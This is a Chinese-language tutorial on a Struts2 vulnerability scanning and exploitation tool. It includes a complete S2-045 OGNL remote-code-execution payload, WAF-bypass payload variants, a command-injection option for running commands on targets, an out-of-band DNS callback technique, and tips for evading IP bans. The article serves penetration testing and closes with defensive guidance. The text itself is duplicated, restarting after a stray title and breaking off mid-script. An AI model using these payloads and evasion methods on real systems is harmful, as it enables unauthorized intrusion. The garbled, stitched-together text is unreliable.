1. 项目概述与核心价值最近在整理内部安全资产时又翻出了这个老伙计——Struts2系列漏洞利用工具。说它是“老伙计”一点不为过从S2-001到S2-061从OGNL表达式注入到远程代码执行Struts2框架的漏洞史几乎就是一部Web安全攻防的编年史。虽然现在新项目用Struts2的少了但你去翻翻那些老牌国企、金融、教育机构的资产Struts2的应用依然广泛甚至一些核心业务系统还在跑着Struts2-016时代的代码。手里没个趁手的检测工具做渗透测试或者红队评估的时候心里总是不踏实。这个工具我习惯叫它“Struts2全版本漏洞检测工具(三)”并不是因为它功能有多花哨界面有多华丽。恰恰相反它是个命令行工具黑底白字但它的价值在于“全”和“稳”。所谓“全”是指它覆盖了从远古到近期的数十个Struts2高危漏洞你不用再为每个漏洞去网上翻找不同的POC概念验证代码和EXP漏洞利用代码。所谓“稳”是指它的检测逻辑经过大量实战环境的打磨误报率低并且内置了多种绕过WAFWeb应用防火墙和异常处理的Payload在复杂的网络环境下依然能保持较高的检出率。对于安全工程师、渗透测试人员甚至是开发人员用于自检来说它都是一个能极大提升效率的利器。今天我就结合自己多年的使用经验把这个工具里里外外拆解一遍分享它的设计思路、核心用法以及那些只有踩过坑才知道的实战技巧。2. 工具核心架构与设计思路拆解2.1 为什么需要“全版本”检测工具在Struts2漏洞爆发的早期安全研究员们通常是“出一个漏洞写一个工具”。这导致工具碎片化严重安全人员需要维护一个庞大的工具库每次测试都要手动切换效率低下且容易遗漏。更麻烦的是Struts2的漏洞多与OGNL表达式解析有关但不同版本对OGNL的过滤和沙箱机制有所不同导致针对某个版本写的Payload在另一个版本上可能完全失效甚至触发防护机制被拦截。这个“全版本”工具的设计初衷就是为了解决这些问题。它的核心思路是建立一个“漏洞指纹库”和“Payload适配引擎”。指纹库不仅记录了每个漏洞的CVE编号如S2-045、S2-057和影响版本范围更重要的是它记录了触发该漏洞的关键特征例如特定的参数名Content-Type,redirect:、特定的参数位置URL参数、HTTP头、Multipart表单以及服务器返回的错误信息特征。Payload适配引擎则负责根据目标URL的响应特征智能地选择和变形Payload以绕过简单的字符串过滤和WAF规则。2.2 工具模块化设计解析工具虽然以一个可执行文件呈现但其内部是高度模块化的主要可以分为以下几个核心模块目标探测与指纹识别模块这是工具的“眼睛”。它首先会向目标发送一个精心构造的、无害的探测请求例如访问一个不存在的.action后缀或者发送一个包含特定头的请求通过分析HTTP响应状态码、Server头、报错信息、Set-Cookie字段有时Struts2的默认错误页面会包含框架信息等来判断目标是否使用了Struts2框架并初步判断其大版本范围。这一步至关重要它能避免对非Struts2应用进行无谓的漏洞检测减少噪音。漏洞载荷库模块这是工具的“武器库”。它以结构化的方式如JSON或YAML存储了所有支持的漏洞利用载荷。每个载荷不仅仅是一段攻击代码而是一个包含多重信息的对象漏洞ID如s2-016。影响版本如Struts 2.0.0 - 2.3.15。利用位置Parameter(URL参数)、Header(HTTP头)、Data(POST数据)、Multipart(文件上传头)。基础Payload最原始的OGNL表达式如#_memberAccess[\allowStaticMethodAccess\]true, java.lang.RuntimegetRuntime().exec(calc)。Payload变种列表为了绕过过滤同一个漏洞可能有多种Payload写法比如使用Unicode编码、十六进制编码、大小写混淆、添加垃圾字符、利用不同的OGNL上下文变量如#parameters,#request,#attr等。检测引擎模块这是工具的“大脑”。它接收目标信息和选定的漏洞载荷负责构造完整的HTTP请求。这里有一个关键设计延时检测与结果判断。工具不是发送Payload后就立刻判断漏洞存在与否而是会发送一个具有“延时效应”的Payload。例如Payload不是直接执行whoami并回显而是执行sleep 5或ping -c 3 127.0.0.1。引擎会记录从发送请求到收到响应的时间差。如果时间差明显大于正常请求例如正常请求200ms检测请求5200ms则高度怀疑命令执行成功漏洞存在。这种方式比依赖命令回显容易被过滤或截断要可靠得多尤其适合盲注场景。结果输出与报告模块这是工具的“嘴巴”。它将检测结果以清晰的结构化格式输出通常包括目标URL、检测的漏洞ID、漏洞等级高危、中危、使用的Payload类型、以及检测耗时等。好的工具还支持将结果导出为JSON、CSV或HTML报告方便集成到自动化扫描平台或用于编写渗透测试报告。3. 核心使用流程与实战操作详解3.1 环境准备与工具获取首先你需要一个可以运行该工具的环境。这类工具通常由Python或Java编写。以Python版本为例你需要确保本机安装了Python 3.6及以上版本并且安装了必要的依赖库最常见的就是requests库用于发送HTTP请求。# 检查Python版本 python3 --version # 安装requests库 pip3 install requests至于工具本体的获取鉴于安全工具的敏感性我不会提供直接的下载链接。但你可以通过一些知名的开源安全工具平台如GitHub搜索相关的关键词如 “Struts2-Scan”, “Struts2-Vuln-Scanner” 等仔细甄别项目的Star数、Issue活跃度和代码质量选择由活跃社区维护的工具。一个重要的安全准则永远不要从不明来源下载和执行安全工具尤其是二进制文件以防被植入后门。假设你已经获取了一个名为struts2-scan.py的Python脚本这就是我们的主角。3.2 基础扫描模式详解最基础的用法是指定一个目标URL进行全漏洞扫描。python3 struts2-scan.py -u http://target.com/login.action执行这条命令后工具会按照以下顺序工作指纹识别访问http://target.com/login.action分析响应判断是否为Struts2应用。加载载荷库读取内置的所有Struts2漏洞Payload。顺序检测按照漏洞编号顺序或危险等级顺序依次向目标发送检测请求。每个请求都使用“延时Payload”。结果输出在终端实时显示检测进度。如果发现漏洞会高亮显示漏洞ID、利用点和验证方式如通过延时5秒确认。实战技巧一控制扫描速度与隐蔽性直接全漏洞扫描会产生大量HTTP请求容易被WAF或IDS入侵检测系统封禁。工具通常提供控制选项# 设置每个请求之间的延迟为2秒 python3 struts2-scan.py -u http://target.com/login.action --delay 2 # 使用随机User-Agent模拟正常浏览器 python3 struts2-scan.py -u http://target.com/login.action --random-agent # 仅检测高危漏洞减少请求次数 python3 struts2-scan.py -u http://target.com/login.action --level high3.3 高级功能批量检测与漏洞利用对于拥有大量目标的情况批量扫描是必须的。# 从urls.txt文件中读取目标列表一行一个URL python3 struts2-scan.py -f urls.txt # 批量扫描并将结果保存到result.json文件 python3 struts2-scan.py -f urls.txt -o result.json更高级的功能是漏洞验证后的利用。一个成熟的工具不应止步于检测还应能提供“证明”。例如检测到S2-045漏洞存在后工具可以进一步执行一个无害的命令来验证漏洞的真实危害性。# 指定检测某个特定漏洞并使用自定义命令进行验证 python3 struts2-scan.py -u http://target.com/ -v s2-045 --cmd id这里的--cmd id参数工具会将其替换到对应S2-045漏洞的Payload模板中构造出最终的攻击请求并尝试获取命令执行结果。请注意在授权测试中务必使用无害命令如whoami,id,echo test绝对禁止执行rm -rf /、format等破坏性命令。实战技巧二处理复杂的应用路径很多Struts2应用并非部署在根路径或者有复杂的URL路由。工具需要能灵活处理。# 目标是一个具体的Action端点 python3 struts2-scan.py -u http://target.com/struts2-showcase/integration/saveGangster.action # 如果不知道具体端点可以尝试对目录进行爬取或结合其他信息搜集工具的结果4. 漏洞检测原理深度剖析与Payload演变4.1 以S2-045为例看漏洞本质S2-045CVE-2017-5638是一个经典的“基于Jakarta Multipart解析器的远程代码执行漏洞”。它的根源在于Struts2在处理文件上传的HTTP请求时会错误地解析Content-Type头部。攻击者可以在Content-Type字段中注入恶意的OGNL表达式。工具中针对S2-045的Payload其核心就是构造一个畸形的Content-Type头Content-Type: %{(#_multipart/form-data).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdwhoami).(#iswin(java.lang.SystemgetProperty(os.name).toLowerCase().contains(win))).(#cmds(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())}这个Payload看起来复杂但其结构是清晰的权限获取(#_memberAccess?(#_memberAccess#dm):...)这段代码的目的是绕过Struts2的安全沙箱允许执行静态方法和访问敏感属性。命令构造(#cmdwhoami)定义要执行的命令。(#iswin...)判断操作系统类型以选择正确的命令行解释器cmd.exe或/bin/bash。命令执行与回显(#pnew java.lang.ProcessBuilder(#cmds)).(#process#p.start())创建进程执行命令。org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)将命令执行的结果直接写入HTTP响应流从而实现回显。工具在实现时会将用户通过--cmd参数传入的命令如id替换到Payload模板的(#cmd...)部分动态生成最终的攻击请求。4.2 Payload的“进化”与WAF绕过随着WAF的普及上述原始Payload很容易被识别和拦截。因此工具的Payload库必须包含“进化”后的变种。编码绕过将OGNL表达式中的关键词进行URL编码、十六进制编码或Unicode编码。原始getRuntime()URL编码getRuntime%28%29Unicode编码\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029字符串拼接将敏感函数名拆分成多个部分再利用OGNL的字符串连接功能。#agetRuntime, #b(), java.lang.Runtime#a#b反射调用利用Java反射机制避免直接调用Runtime.getRuntime()。#cljava.lang.ClassforName(java.lang.Runtime), #method#cl.getMethod(getRuntime), #obj#method.invoke(null), #obj.exec(calc)添加垃圾参数在Payload中插入大量无意义的参数或注释扰乱WAF的字符串匹配。...foobartest123...恶意Payload...anotherparam一个好的检测工具其Payload引擎会自动尝试这些变种组合直到找到一个能成功触发延时效应且不被WAF拦截的Payload为止。5. 实战中的常见问题与排查技巧实录即使工具设计得再完善在实际网络环境中也会遇到各种问题。下面是我总结的一些常见“坑”及解决方法。5.1 问题一工具报告“未检测到Struts2框架”可能原因1目标URL不正确。Struts2的Action可能以.do,.action结尾也可能没有后缀通过URL重写。尝试访问一些常见默认路径如/index.action,/login.action,/struts2-showcase/或者使用目录扫描工具如dirsearch先发现可能的端点。可能原因2网络问题或代理配置。工具无法连接到目标。检查网络连通性ping、telnet如果测试环境需要走代理确保工具支持并正确配置了代理参数如--proxy http://127.0.0.1:8080。可能原因3指纹被隐藏。目标服务器可能修改了默认错误页面隐藏了框架指纹。此时可以尝试使用“强制检测模式”如果工具提供即不依赖指纹直接对所有已知漏洞进行探测但这会产生大量流量。5.2 问题二工具检测到漏洞但延时验证失败可能原因1Payload被过滤或执行失败。目标系统可能对OGNL表达式做了输入过滤或者命令执行环境受限如Runtime.exec被安全管理器禁止。查看工具是否提供了其他Payload变种或者尝试使用更简单的验证命令如echo dGVzdA | base64 -d输出test看是否能回显。可能原因2网络延迟不稳定。工具设置的延时阈值如5秒可能因为网络波动而被误判。可以尝试增加延时阈值如--timeout 10或者改用DNS外带技术如果Payload支持进行无回显验证即让目标服务器执行nslookup your-dns-log-server.com你在自己的DNS服务器上查看日志这是更隐蔽的验证方式。可能原因3工具Payload与目标环境不兼容。例如针对Linux系统的Payload用在了Windows服务器上。高级工具应该能自动或手动指定操作系统类型。5.3 问题三扫描过程中请求被中断或IP被封禁解决方案1降低扫描频率。大幅增加--delay参数的值比如设置为5秒或10秒并启用--random-agent。解决方案2使用代理池。如果条件允许配置工具使用多个代理IP进行轮询可以有效分散流量避免单个IP被封锁。解决方案3分时段、分漏洞扫描。不要一次性扫描所有漏洞。可以先扫描几个最经典的高危漏洞如S2-016, S2-045, S2-057如果都没问题再考虑在业务低峰期进行深度扫描。5.4 问题四工具本身报错或运行异常排查步骤检查Python环境和依赖运行python3 -c import requests; print(requests.__version__)确认requests库已正确安装。检查脚本语法运行python3 -m py_compile struts2-scan.py检查是否有语法错误。查看错误信息仔细阅读命令行报错信息。常见的错误如“Invalid URL”表示URL格式错误“Connection refused”表示网络不通。查阅工具文档或Issues如果是开源工具去其GitHub仓库的Issues页面搜索是否有类似问题及解决方案。重要提示法律与道德边界所有漏洞检测活动必须在获得明确书面授权的范围内进行。未经授权对任何系统进行扫描或测试均属违法行为。本工具及文中所述技术仅用于安全研究、教学和授权测试使用者需自行承担一切法律责任。6. 工具在自动化流程中的集成应用对于企业安全团队或专业安全服务厂商单次手动运行工具效率太低。我们需要将其集成到自动化资产巡检或渗透测试流程中。6.1 与资产发现平台结合可以将此工具封装为一个独立的扫描插件。工作流程如下资产发现平台如Shodan、FOFA爬虫或内部的CMDB定期输出一批疑似使用Struts2的IP和URL列表。调度系统如Jenkins、Rundeck或自研脚本读取URL列表并发调用多个struts2-scan.py进程进行扫描。扫描工具将结果以JSON格式输出到指定目录。另一个结果聚合脚本解析所有JSON文件将漏洞数据目标URL、漏洞ID、发现时间写入中央数据库如Elasticsearch或工单系统如Jira自动生成待处理的安全工单。6.2 编写简单的集成脚本示例下面是一个简单的Python封装脚本演示如何批量调用扫描工具并处理结果。#!/usr/bin/env python3 import subprocess import json import sys from concurrent.futures import ThreadPoolExecutor, as_completed def scan_single_url(url): 对单个URL执行扫描 cmd [python3, struts2-scan.py, -u, url, -o, json, --quiet] # --quiet 减少终端输出 try: # 执行扫描命令设置超时时间 result subprocess.run(cmd, capture_outputTrue, textTrue, timeout120) if result.returncode 0: # 假设工具将JSON结果直接打印到stdout output result.stdout try: scan_result json.loads(output) return url, scan_result except json.JSONDecodeError: return url, {error: Failed to parse JSON output, raw: output[:200]} else: return url, {error: fScan failed with return code {result.returncode}, stderr: result.stderr} except subprocess.TimeoutExpired: return url, {error: Scan timed out after 120 seconds} except Exception as e: return url, {error: str(e)} def main(url_list_file): with open(url_list_file, r) as f: urls [line.strip() for line in f if line.strip()] all_results [] # 使用线程池控制并发数避免对目标造成过大压力 with ThreadPoolExecutor(max_workers5) as executor: future_to_url {executor.submit(scan_single_url, url): url for url in urls} for future in as_completed(future_to_url): url future_to_url[future] try: url, result future.result() all_results.append({url: url, result: result}) print(fFinished scanning: {url}) except Exception as exc: print(f{url} generated an exception: {exc}) # 将汇总结果保存到文件 with open(batch_scan_results.json, w) as f: json.dump(all_results, f, indent2) print(f\nScan completed. Results saved to batch_scan_results.json) # 简单统计打印存在漏洞的URL print(\n[] Vulnerable Targets Found:) for item in all_results: res item[result] if isinstance(res, dict) and res.get(vulnerable) True: # 根据实际工具的输出结构调整 print(f - {item[url]}: {res.get(vuln_id, N/A)}) if __name__ __main__: if len(sys.argv) ! 2: print(fUsage: {sys.argv[0]} url_list.txt) sys.exit(1) main(sys.argv[1])这个脚本提供了基本的并发扫描和结果聚合功能。在实际集成中你需要根据所用扫描工具的实际输出格式是打印到屏幕还是生成文件JSON结构如何来调整解析逻辑。7. 防御视角如何防范Struts2漏洞被利用作为一名安全从业者我们不仅要懂得如何发现漏洞更要明白如何修复和防御。从防御者角度看应对Struts2漏洞治本和治标需结合。7.1 治本之策升级与修复官方补丁密切关注Apache Struts官方安全公告一旦有漏洞公布立即评估影响并升级到已修复的版本。这是最根本、最有效的方法。建立内部的软件成分分析SCA流程持续盘点所有项目中使用的Struts2版本。代码审计如果因历史原因无法立即升级需要对受影响的代码进行人工审计或使用IAST交互式应用安全测试工具定位到使用了漏洞组件的具体位置尝试通过代码层面对输入进行严格的过滤和校验。框架替换对于新建项目应尽量避免使用已停止维护或漏洞频发的老旧框架。考虑迁移到更现代、维护更积极的MVC框架如Spring MVC。7.2 治标之策外围防护与缓解WAF规则部署在应用前端部署WAF并确保其规则库更新到最新能够识别和拦截常见的Struts2 OGNL注入攻击模式。可以自定义规则针对Content-Type头、特定参数名如redirect:中包含的OGNL关键字#,,_memberAccess,getRuntime等进行过滤。网络层限制严格限制服务器出站流量。即使攻击者成功执行了命令如果无法将结果回传DNS、HTTP外带或下载后续恶意软件其攻击效果也会大打折扣。使用防火墙策略或主机防火墙如iptables限制服务器只能访问必要的内部服务和特定的外部更新源。运行时保护RASP在应用服务器上部署RASP解决方案。RASP能深入到应用运行时内部监控OGNL表达式的解析和执行过程一旦发现试图调用危险方法如Runtime.exec()、ProcessBuilder.start()立即中断并告警。这种方式不依赖特征码防御效果更好。最小权限原则运行Struts2应用的服务器进程如Tomcat的Java进程应使用非root、低权限的用户身份运行。这样即使被攻破攻击者能造成的破坏也有限。工具的价值在于帮助我们快速发现风险而真正的安全在于持续性的治理和扎实的防护措施。将这个Struts2检测工具纳入你的安全武器库定期对授权资产进行扫描同时推动开发团队修复漏洞、升级框架才能构筑起主动防御的安全体系。
Struts2全版本漏洞检测工具实战:原理、应用与自动化集成
1. 项目概述与核心价值最近在整理内部安全资产时又翻出了这个老伙计——Struts2系列漏洞利用工具。说它是“老伙计”一点不为过从S2-001到S2-061从OGNL表达式注入到远程代码执行Struts2框架的漏洞史几乎就是一部Web安全攻防的编年史。虽然现在新项目用Struts2的少了但你去翻翻那些老牌国企、金融、教育机构的资产Struts2的应用依然广泛甚至一些核心业务系统还在跑着Struts2-016时代的代码。手里没个趁手的检测工具做渗透测试或者红队评估的时候心里总是不踏实。这个工具我习惯叫它“Struts2全版本漏洞检测工具(三)”并不是因为它功能有多花哨界面有多华丽。恰恰相反它是个命令行工具黑底白字但它的价值在于“全”和“稳”。所谓“全”是指它覆盖了从远古到近期的数十个Struts2高危漏洞你不用再为每个漏洞去网上翻找不同的POC概念验证代码和EXP漏洞利用代码。所谓“稳”是指它的检测逻辑经过大量实战环境的打磨误报率低并且内置了多种绕过WAFWeb应用防火墙和异常处理的Payload在复杂的网络环境下依然能保持较高的检出率。对于安全工程师、渗透测试人员甚至是开发人员用于自检来说它都是一个能极大提升效率的利器。今天我就结合自己多年的使用经验把这个工具里里外外拆解一遍分享它的设计思路、核心用法以及那些只有踩过坑才知道的实战技巧。2. 工具核心架构与设计思路拆解2.1 为什么需要“全版本”检测工具在Struts2漏洞爆发的早期安全研究员们通常是“出一个漏洞写一个工具”。这导致工具碎片化严重安全人员需要维护一个庞大的工具库每次测试都要手动切换效率低下且容易遗漏。更麻烦的是Struts2的漏洞多与OGNL表达式解析有关但不同版本对OGNL的过滤和沙箱机制有所不同导致针对某个版本写的Payload在另一个版本上可能完全失效甚至触发防护机制被拦截。这个“全版本”工具的设计初衷就是为了解决这些问题。它的核心思路是建立一个“漏洞指纹库”和“Payload适配引擎”。指纹库不仅记录了每个漏洞的CVE编号如S2-045、S2-057和影响版本范围更重要的是它记录了触发该漏洞的关键特征例如特定的参数名Content-Type,redirect:、特定的参数位置URL参数、HTTP头、Multipart表单以及服务器返回的错误信息特征。Payload适配引擎则负责根据目标URL的响应特征智能地选择和变形Payload以绕过简单的字符串过滤和WAF规则。2.2 工具模块化设计解析工具虽然以一个可执行文件呈现但其内部是高度模块化的主要可以分为以下几个核心模块目标探测与指纹识别模块这是工具的“眼睛”。它首先会向目标发送一个精心构造的、无害的探测请求例如访问一个不存在的.action后缀或者发送一个包含特定头的请求通过分析HTTP响应状态码、Server头、报错信息、Set-Cookie字段有时Struts2的默认错误页面会包含框架信息等来判断目标是否使用了Struts2框架并初步判断其大版本范围。这一步至关重要它能避免对非Struts2应用进行无谓的漏洞检测减少噪音。漏洞载荷库模块这是工具的“武器库”。它以结构化的方式如JSON或YAML存储了所有支持的漏洞利用载荷。每个载荷不仅仅是一段攻击代码而是一个包含多重信息的对象漏洞ID如s2-016。影响版本如Struts 2.0.0 - 2.3.15。利用位置Parameter(URL参数)、Header(HTTP头)、Data(POST数据)、Multipart(文件上传头)。基础Payload最原始的OGNL表达式如#_memberAccess[\allowStaticMethodAccess\]true, java.lang.RuntimegetRuntime().exec(calc)。Payload变种列表为了绕过过滤同一个漏洞可能有多种Payload写法比如使用Unicode编码、十六进制编码、大小写混淆、添加垃圾字符、利用不同的OGNL上下文变量如#parameters,#request,#attr等。检测引擎模块这是工具的“大脑”。它接收目标信息和选定的漏洞载荷负责构造完整的HTTP请求。这里有一个关键设计延时检测与结果判断。工具不是发送Payload后就立刻判断漏洞存在与否而是会发送一个具有“延时效应”的Payload。例如Payload不是直接执行whoami并回显而是执行sleep 5或ping -c 3 127.0.0.1。引擎会记录从发送请求到收到响应的时间差。如果时间差明显大于正常请求例如正常请求200ms检测请求5200ms则高度怀疑命令执行成功漏洞存在。这种方式比依赖命令回显容易被过滤或截断要可靠得多尤其适合盲注场景。结果输出与报告模块这是工具的“嘴巴”。它将检测结果以清晰的结构化格式输出通常包括目标URL、检测的漏洞ID、漏洞等级高危、中危、使用的Payload类型、以及检测耗时等。好的工具还支持将结果导出为JSON、CSV或HTML报告方便集成到自动化扫描平台或用于编写渗透测试报告。3. 核心使用流程与实战操作详解3.1 环境准备与工具获取首先你需要一个可以运行该工具的环境。这类工具通常由Python或Java编写。以Python版本为例你需要确保本机安装了Python 3.6及以上版本并且安装了必要的依赖库最常见的就是requests库用于发送HTTP请求。# 检查Python版本 python3 --version # 安装requests库 pip3 install requests至于工具本体的获取鉴于安全工具的敏感性我不会提供直接的下载链接。但你可以通过一些知名的开源安全工具平台如GitHub搜索相关的关键词如 “Struts2-Scan”, “Struts2-Vuln-Scanner” 等仔细甄别项目的Star数、Issue活跃度和代码质量选择由活跃社区维护的工具。一个重要的安全准则永远不要从不明来源下载和执行安全工具尤其是二进制文件以防被植入后门。假设你已经获取了一个名为struts2-scan.py的Python脚本这就是我们的主角。3.2 基础扫描模式详解最基础的用法是指定一个目标URL进行全漏洞扫描。python3 struts2-scan.py -u http://target.com/login.action执行这条命令后工具会按照以下顺序工作指纹识别访问http://target.com/login.action分析响应判断是否为Struts2应用。加载载荷库读取内置的所有Struts2漏洞Payload。顺序检测按照漏洞编号顺序或危险等级顺序依次向目标发送检测请求。每个请求都使用“延时Payload”。结果输出在终端实时显示检测进度。如果发现漏洞会高亮显示漏洞ID、利用点和验证方式如通过延时5秒确认。实战技巧一控制扫描速度与隐蔽性直接全漏洞扫描会产生大量HTTP请求容易被WAF或IDS入侵检测系统封禁。工具通常提供控制选项# 设置每个请求之间的延迟为2秒 python3 struts2-scan.py -u http://target.com/login.action --delay 2 # 使用随机User-Agent模拟正常浏览器 python3 struts2-scan.py -u http://target.com/login.action --random-agent # 仅检测高危漏洞减少请求次数 python3 struts2-scan.py -u http://target.com/login.action --level high3.3 高级功能批量检测与漏洞利用对于拥有大量目标的情况批量扫描是必须的。# 从urls.txt文件中读取目标列表一行一个URL python3 struts2-scan.py -f urls.txt # 批量扫描并将结果保存到result.json文件 python3 struts2-scan.py -f urls.txt -o result.json更高级的功能是漏洞验证后的利用。一个成熟的工具不应止步于检测还应能提供“证明”。例如检测到S2-045漏洞存在后工具可以进一步执行一个无害的命令来验证漏洞的真实危害性。# 指定检测某个特定漏洞并使用自定义命令进行验证 python3 struts2-scan.py -u http://target.com/ -v s2-045 --cmd id这里的--cmd id参数工具会将其替换到对应S2-045漏洞的Payload模板中构造出最终的攻击请求并尝试获取命令执行结果。请注意在授权测试中务必使用无害命令如whoami,id,echo test绝对禁止执行rm -rf /、format等破坏性命令。实战技巧二处理复杂的应用路径很多Struts2应用并非部署在根路径或者有复杂的URL路由。工具需要能灵活处理。# 目标是一个具体的Action端点 python3 struts2-scan.py -u http://target.com/struts2-showcase/integration/saveGangster.action # 如果不知道具体端点可以尝试对目录进行爬取或结合其他信息搜集工具的结果4. 漏洞检测原理深度剖析与Payload演变4.1 以S2-045为例看漏洞本质S2-045CVE-2017-5638是一个经典的“基于Jakarta Multipart解析器的远程代码执行漏洞”。它的根源在于Struts2在处理文件上传的HTTP请求时会错误地解析Content-Type头部。攻击者可以在Content-Type字段中注入恶意的OGNL表达式。工具中针对S2-045的Payload其核心就是构造一个畸形的Content-Type头Content-Type: %{(#_multipart/form-data).(#dmognl.OgnlContextDEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess#dm):((#container#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil#container.getInstance(com.opensymphony.xwork2.ognl.OgnlUtilclass)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdwhoami).(#iswin(java.lang.SystemgetProperty(os.name).toLowerCase().contains(win))).(#cmds(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#pnew java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process#p.start()).(#ros(org.apache.struts2.ServletActionContextgetResponse().getOutputStream())).(org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)).(#ros.flush())}这个Payload看起来复杂但其结构是清晰的权限获取(#_memberAccess?(#_memberAccess#dm):...)这段代码的目的是绕过Struts2的安全沙箱允许执行静态方法和访问敏感属性。命令构造(#cmdwhoami)定义要执行的命令。(#iswin...)判断操作系统类型以选择正确的命令行解释器cmd.exe或/bin/bash。命令执行与回显(#pnew java.lang.ProcessBuilder(#cmds)).(#process#p.start())创建进程执行命令。org.apache.commons.io.IOUtilscopy(#process.getInputStream(),#ros)将命令执行的结果直接写入HTTP响应流从而实现回显。工具在实现时会将用户通过--cmd参数传入的命令如id替换到Payload模板的(#cmd...)部分动态生成最终的攻击请求。4.2 Payload的“进化”与WAF绕过随着WAF的普及上述原始Payload很容易被识别和拦截。因此工具的Payload库必须包含“进化”后的变种。编码绕过将OGNL表达式中的关键词进行URL编码、十六进制编码或Unicode编码。原始getRuntime()URL编码getRuntime%28%29Unicode编码\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029字符串拼接将敏感函数名拆分成多个部分再利用OGNL的字符串连接功能。#agetRuntime, #b(), java.lang.Runtime#a#b反射调用利用Java反射机制避免直接调用Runtime.getRuntime()。#cljava.lang.ClassforName(java.lang.Runtime), #method#cl.getMethod(getRuntime), #obj#method.invoke(null), #obj.exec(calc)添加垃圾参数在Payload中插入大量无意义的参数或注释扰乱WAF的字符串匹配。...foobartest123...恶意Payload...anotherparam一个好的检测工具其Payload引擎会自动尝试这些变种组合直到找到一个能成功触发延时效应且不被WAF拦截的Payload为止。5. 实战中的常见问题与排查技巧实录即使工具设计得再完善在实际网络环境中也会遇到各种问题。下面是我总结的一些常见“坑”及解决方法。5.1 问题一工具报告“未检测到Struts2框架”可能原因1目标URL不正确。Struts2的Action可能以.do,.action结尾也可能没有后缀通过URL重写。尝试访问一些常见默认路径如/index.action,/login.action,/struts2-showcase/或者使用目录扫描工具如dirsearch先发现可能的端点。可能原因2网络问题或代理配置。工具无法连接到目标。检查网络连通性ping、telnet如果测试环境需要走代理确保工具支持并正确配置了代理参数如--proxy http://127.0.0.1:8080。可能原因3指纹被隐藏。目标服务器可能修改了默认错误页面隐藏了框架指纹。此时可以尝试使用“强制检测模式”如果工具提供即不依赖指纹直接对所有已知漏洞进行探测但这会产生大量流量。5.2 问题二工具检测到漏洞但延时验证失败可能原因1Payload被过滤或执行失败。目标系统可能对OGNL表达式做了输入过滤或者命令执行环境受限如Runtime.exec被安全管理器禁止。查看工具是否提供了其他Payload变种或者尝试使用更简单的验证命令如echo dGVzdA | base64 -d输出test看是否能回显。可能原因2网络延迟不稳定。工具设置的延时阈值如5秒可能因为网络波动而被误判。可以尝试增加延时阈值如--timeout 10或者改用DNS外带技术如果Payload支持进行无回显验证即让目标服务器执行nslookup your-dns-log-server.com你在自己的DNS服务器上查看日志这是更隐蔽的验证方式。可能原因3工具Payload与目标环境不兼容。例如针对Linux系统的Payload用在了Windows服务器上。高级工具应该能自动或手动指定操作系统类型。5.3 问题三扫描过程中请求被中断或IP被封禁解决方案1降低扫描频率。大幅增加--delay参数的值比如设置为5秒或10秒并启用--random-agent。解决方案2使用代理池。如果条件允许配置工具使用多个代理IP进行轮询可以有效分散流量避免单个IP被封锁。解决方案3分时段、分漏洞扫描。不要一次性扫描所有漏洞。可以先扫描几个最经典的高危漏洞如S2-016, S2-045, S2-057如果都没问题再考虑在业务低峰期进行深度扫描。5.4 问题四工具本身报错或运行异常排查步骤检查Python环境和依赖运行python3 -c import requests; print(requests.__version__)确认requests库已正确安装。检查脚本语法运行python3 -m py_compile struts2-scan.py检查是否有语法错误。查看错误信息仔细阅读命令行报错信息。常见的错误如“Invalid URL”表示URL格式错误“Connection refused”表示网络不通。查阅工具文档或Issues如果是开源工具去其GitHub仓库的Issues页面搜索是否有类似问题及解决方案。重要提示法律与道德边界所有漏洞检测活动必须在获得明确书面授权的范围内进行。未经授权对任何系统进行扫描或测试均属违法行为。本工具及文中所述技术仅用于安全研究、教学和授权测试使用者需自行承担一切法律责任。6. 工具在自动化流程中的集成应用对于企业安全团队或专业安全服务厂商单次手动运行工具效率太低。我们需要将其集成到自动化资产巡检或渗透测试流程中。6.1 与资产发现平台结合可以将此工具封装为一个独立的扫描插件。工作流程如下资产发现平台如Shodan、FOFA爬虫或内部的CMDB定期输出一批疑似使用Struts2的IP和URL列表。调度系统如Jenkins、Rundeck或自研脚本读取URL列表并发调用多个struts2-scan.py进程进行扫描。扫描工具将结果以JSON格式输出到指定目录。另一个结果聚合脚本解析所有JSON文件将漏洞数据目标URL、漏洞ID、发现时间写入中央数据库如Elasticsearch或工单系统如Jira自动生成待处理的安全工单。6.2 编写简单的集成脚本示例下面是一个简单的Python封装脚本演示如何批量调用扫描工具并处理结果。#!/usr/bin/env python3 import subprocess import json import sys from concurrent.futures import ThreadPoolExecutor, as_completed def scan_single_url(url): 对单个URL执行扫描 cmd [python3, struts2-scan.py, -u, url, -o, json, --quiet] # --quiet 减少终端输出 try: # 执行扫描命令设置超时时间 result subprocess.run(cmd, capture_outputTrue, textTrue, timeout120) if result.returncode 0: # 假设工具将JSON结果直接打印到stdout output result.stdout try: scan_result json.loads(output) return url, scan_result except json.JSONDecodeError: return url, {error: Failed to parse JSON output, raw: output[:200]} else: return url, {error: fScan failed with return code {result.returncode}, stderr: result.stderr} except subprocess.TimeoutExpired: return url, {error: Scan timed out after 120 seconds} except Exception as e: return url, {error: str(e)} def main(url_list_file): with open(url_list_file, r) as f: urls [line.strip() for line in f if line.strip()] all_results [] # 使用线程池控制并发数避免对目标造成过大压力 with 